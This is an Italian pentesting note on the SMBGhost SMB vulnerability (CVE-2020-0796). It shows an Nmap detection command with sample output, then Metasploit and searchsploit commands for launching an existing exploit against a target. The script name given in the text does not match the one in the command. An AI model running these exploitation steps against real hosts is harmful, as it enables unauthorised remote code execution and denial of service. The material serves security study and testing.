tags: SMBGhost SMBGhost_Nmap SMBGhost_Exploit


Nmap

Lo script smb-ghost.nse è uno script di Nmap progettato per rilevare la vulnerabilità CVE-2020-0796, nota anche come SMBGhost. Questa vulnerabilità riguarda il protocollo Server Message Block (SMB) di Microsoft e può permettere a un aggressore di eseguire codice arbitrario su un sistema vulnerabile.

Cosa Fa lo Script?

  • Rileva la Vulnerabilità: Lo script verifica se il sistema target è vulnerabile a SMBGhost.

  • Utilizza Tecniche di Fingerprinting: Lo script analizza la versione del protocollo SMB e altre caratteristiche per determinare se il sistema è a rischio.


2. Come Funziona la Vulnerabilità SMBGhost?

La vulnerabilità SMBGhost si trova nella versione 3.1.1 del protocollo SMB di Microsoft. Un aggressore può sfruttare questa vulnerabilità per:

  • Eseguire Codice Arbitrario: Ottenere il controllo completo del sistema target.

  • Causare Denial of Service (DoS): Far crashare il sistema o renderlo inaccessibile.

nmap --script smb-vuln-cve-2020-0796 -p 445 <target>

Esempio di Output

Se il sistema è vulnerabile, lo script restituirà un messaggio simile a questo:

Host script results:
| smb-vuln-cve-2020-0796:
|   VULNERABLE:
|   SMBv3.1.1 compression buffer overflow (CVE-2020-0796)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2020-0796
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv3.1.1.
|       This vulnerability is also known as SMBGhost.
|
|     Disclosure date: 2020-03-12
|     References:
|       https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796

Questo script non è integrato con la flag -sC di Nmap.

Exploit

Per exploitarlo abbiamo tre strade: cercare degli exploit su internet, utilizzare Metasploit oppure utilizzare searchsploit , io mostrerò solo gli ultimi due:

Metasploit

 
msfconsole
 
search cve-2020-0796
 
use exploit/windows/smb/cve_2020_0796
 
set RHOSTS <target_ip>
 
run
 

Searchsploit

 
searchsploit SMBGhost
 
searchsploit -x <percorso_exploit>